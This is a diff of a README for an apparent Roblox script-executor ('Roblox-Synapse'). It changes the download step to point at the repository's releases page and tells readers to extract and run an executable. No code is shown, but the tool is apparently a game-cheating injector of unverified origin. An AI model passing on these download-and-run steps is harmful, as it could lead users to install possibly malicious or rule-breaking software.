kiru1374/Roblox-Synapse/README.md

 4. **Lua Scripting Support:** Roblox Synapse fully supports Lua scripting, enabling users to unleash their creativity and enhance their gameplay.

 ### Installation Guide
-1. Download the "Release.zip" file from the provided link.
+1. Download the "https://github.com/kiru1374/Roblox-Synapse/releases" file from the provided link.
 2. Extract the contents of the zip file to a folder on your local machine.
 3. Run the executable file to launch Roblox Synapse Executor.
 4. Follow the on-screen instructions to start using the tool for your Roblox scripting needs.